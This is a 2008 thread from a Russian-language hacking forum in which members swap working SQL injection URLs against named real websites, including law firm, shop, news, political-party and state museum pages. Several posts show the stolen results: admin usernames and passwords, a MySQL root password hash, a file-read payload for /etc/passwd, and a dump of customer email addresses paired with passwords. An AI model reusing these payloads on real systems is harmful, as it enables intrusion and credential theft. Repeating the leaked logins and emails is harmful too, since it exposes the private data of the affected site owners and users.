HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.12.2008, 11:58
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.lawfirm.ru/article/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(char(32,45,32), version(),user(),database()),25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41--
 
Ответить с цитированием

  #2  
Старый 19.12.2008, 12:05
0xA1isa
Новичок
Регистрация: 19.06.2007
Сообщений: 8
Провел на форуме:
218478

Репутация: 23
По умолчанию

http://tibetska-medicina.cz/aktuality.php?cislo=-26'+union+select+1,user(),version(),concat_ws(':', username,password),5,6+from+users/*

karlos:kunes1
 
Ответить с цитированием

  #3  
Старый 19.12.2008, 17:15
0xA1isa
Новичок
Регистрация: 19.06.2007
Сообщений: 8
Провел на форуме:
218478

Репутация: 23
По умолчанию

http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,group_conc at(table_name+separator+0x0a),8,9,10+from+informat ion_schema.tables/*

http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,concat(log in,0x0a,password),8,9,10+from+login+limit+0,1/*

mythical:mistake

и кривая админка конечно же в /admin/ находиться....
 
Ответить с цитированием

  #4  
Старый 19.12.2008, 19:07
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,version(),4,5,6,7,8,9/*
4.0.25-standard
PR 5

Код:
http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat(user,0x3b,password),4,5,6,7,8,9+from+mysql.user/*
root;14471e9057c154d6

Последний раз редактировалось faza02; 19.12.2008 в 19:26..
 
Ответить с цитированием

  #5  
Старый 19.12.2008, 23:34
0xA1isa
Новичок
Регистрация: 19.06.2007
Сообщений: 8
Провел на форуме:
218478

Репутация: 23
По умолчанию

http://www.jurnal.org/articles.php?rub=ekon'+union+select+1,2,version(), user(),5,6+limit+160,100/*



http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,login,pass wd),3,4,user(),6,7,8+from+users+limit+0,1/*

http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,username,p asswd),3,4,user(),6,7,8+from+adm+limit+0,1/*

tm mw3p2dfv
 
Ответить с цитированием

  #6  
Старый 20.12.2008, 00:49
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6,7,8,9--
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9+from+information_schema.tables--
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(column_nam e))),3,4,5,6,7,8,9+from+information_schema.columns +where+table_name=0x3132616c6c5f61646d696e--
 
Ответить с цитированием

  #7  
Старый 20.12.2008, 00:57
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Пробежались по магазинам!

http://mediacomp.ru/?action=sub_kat&top_kat=-2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71)/*

Database Version: 4.1.18-standard
Database name: db_mediacomp
User name: mediacomp@localhost


http://www.stereophones.ru/comments.php?id=123+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),4,5--&model_name=Yamaha%20RH5MA


version:5.0.67-log
user:u45585@10.10.153.188
database:u45585


Getting Data from table mail (493 Rows) from database u45585
Fields email:status:idass

[1]:schelin@rol.ru:0:5:9kSA4wHn
[2]:dimik@dimik.ru:0:15:4FfNS]D?M
[3]:zed-dead@inbox.ru:1:6:Y3dD]oUq
[4]:Leon@dti.iks.ru:1:7:i?uNNF;Yb
[5]:konovalenkoe@list.ru:1:8:h_`_6Q1T
[6]:e-stat@mail.ru:1:9:P7?5CFUPa
[7]:serbv1@rambler.ru:0:10:ZmQtGW
[8]:eros433@ztel.ru:1:11:yCdW_>];
[9]:mvv@metib.ru:1:12:are2@k
[10]:maxx@mks.ua:1:13:C7t^pBm
[11]:ib1969@mail.ru:1:14:Y1^fq5g7g
[12]:lie777@list.ru:1:16:vUJBWZa_l
 
Ответить с цитированием

  #8  
Старый 20.12.2008, 09:55
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

State.hi.us - пр 7
Цитата:
http://www.state.hi.us/sfca/artmuseum.php?article_id=-25+union+select+1,2,3,4,5,6,7,version(),9,10/*
xyz разкрутиш )
 
Ответить с цитированием

  #9  
Старый 20.12.2008, 17:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://elftor.com/elftor.php?number=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Код:
http://www.frutonyanya.ru/php/news.php?n=25&c=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
хз, подобрал точно, но ничего не выводится о_О
 
Ответить с цитированием

  #10  
Старый 20.12.2008, 17:05
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Всё там выводится:

Db Version: 4.1.22-log
Db name: frutony3_fn
UserName: frutony3_fn@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ